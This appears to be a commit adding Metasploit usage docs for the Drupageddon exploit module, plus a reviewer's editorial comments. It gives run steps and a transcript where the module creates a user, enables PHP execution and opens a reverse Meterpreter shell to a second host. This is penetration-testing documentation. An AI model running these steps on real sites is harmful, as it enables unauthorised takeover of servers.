Land #7322, drupal_drupageddon module docs
commit 030e09c9c6
@ -0,0 +1,57 @@
|
||||||
|
## Vulnerable Application
|
||||||
|
|
||||||
|
Drupal 7.31 official [download](https://ftp.drupal.org/files/projects/drupal-7.31.tar.gz)
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
1. Install the application
|
||||||
|
2. Start msfconsole
|
||||||
|
3. Do: `use exploit/multi/http/drupal_drupageddon`
|
||||||
|
4. Do: `set rhost <ip>`
|
||||||
|
5. Do: `run`
|
||||||
|
6. You should get a shell.
|
||||||
|
|
||||||
|
## Scenarios
|
||||||
|
|
||||||
|
This is a run against a Drupal 7.31 linux box.
|
||||||
|
|
||||||
|
```
|
||||||
|
msf > use exploit/multi/http/drupal_drupageddon
|
||||||
|
msf exploit(drupal_drupageddon)
|
||||||
|
msf exploit(drupal_drupageddon) > set rhost 1.1.1.1
|
||||||
|
rhost => 1.1.1.1
|
||||||
|
msf exploit(drupal_drupageddon) > set verbose true
|
||||||
|
verbose => true
|
||||||
|
msf exploit(drupal_drupageddon) > exploit
|
||||||
|
|
||||||
|
[*] Started reverse TCP handler on 2.2.2.2:4444
|
||||||
|
[*] Testing page
|
||||||
|
[*] form_build_id: form-a1VaaaEaa0lUvL79wIAfdQEaaJRw8P7a1aWGXElI_Go
|
||||||
|
[*] form_token:
|
||||||
|
[*] password hash: $P\$8zAAApjTciVA2qz7HdAA0UjAAwUft00
|
||||||
|
[*] Creating new user AaCaUlLaPR:AAgeAAAAjA
|
||||||
|
[*] Logging in as AaCaUlLaPR:AAgeAAAAjA
|
||||||
|
[*] cookie: SESS911797186fac11111d08b1111a15db55=aaSfinhC0AAAAbzhAoO3bBaaOerRrvpn3cL0rA77Dhg;
|
||||||
|
[*] Trying to parse enabled modules
|
||||||
|
[*] form_build_id: form-YZljDkG8n5AAaAaAaaaYGLaP8MIfdif5VfwjQMMxdN0
|
||||||
|
[*] form_token: Bj92oAaAaWRwqyAAAySWQpeUI03aA9wfkAozXsk_t_E
|
||||||
|
[*] Enabling the PHP filter module
|
||||||
|
[*] Setting permissions for PHP filter module
|
||||||
|
[*] form_build_id: form-1Z1pAg11amM-1jHALgm1AAAAA1JdwAAA1qXnSTZahPA
|
||||||
|
[*] form_token: kAA1A1AfqK_PvJQi1AAAAAAAAxyGyLvHemBor1q11Z1
|
||||||
|
[*] admin role id: 3
|
||||||
|
[*] Getting tokens from create new article page
|
||||||
|
[*] form_build_id: form-_-leQaaaAAeBXbAaAAaaAAx1IrYSI1qeA2OGf2Ce1vs
|
||||||
|
[*] form_token: Ib1y8aAaaAAAdapA53kUcfWf7msTRHiDUb_CIKzAAAA
|
||||||
|
[*] Calling preview page. Exploit should trigger...
|
||||||
|
[*] Sending stage (33721 bytes) to 1.1.1.1
|
||||||
|
[*] Meterpreter session 1 opened (2.2.2.2:4444 -> 1.1.1.1:45388) at 2016-08-25 11:30:41 -0400
|
||||||
|
|
||||||
|
meterpreter > sysinfo
|
||||||
|
Computer : drupal
|
||||||
|
OS : Linux drupal 2.6.32-642.3.1.el6.x86_64 #1 SMP Sun Jun 26 18:16:44 EDT 2016 x86_64
|
||||||
|
Meterpreter : php/linux
|
||||||
|
|
||||||
|
meterpreter > getuid
|
||||||
|
Server username: apache (48)
|
||||||
|
```
|
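Review bot: The Scenarios transcript shows the module making persistent changes to the target ("Creating new user AaCaUlLaPR:AAgeAAAAjA", "Enabling the PHP filter module", "Setting permissions for PHP filter module"), but neither Verification Steps nor Scenarios mentions them or how to revert them. Add a short note listing these side effects and the cleanup expected after a test run. Verification Steps also omits `set verbose true`, which the transcript depends on for the output it shows, and the transcript carries a stray empty prompt line (`msf exploit(drupal_drupageddon)`) right after the `use` command that should be dropped. The password hash line contains `$P\$`, where the backslash looks like leftover escaping. The Vulnerable Application section gives only the 7.31 download link; a sentence describing the flaw and pointing to the corresponding advisory would let readers confirm which versions are affected.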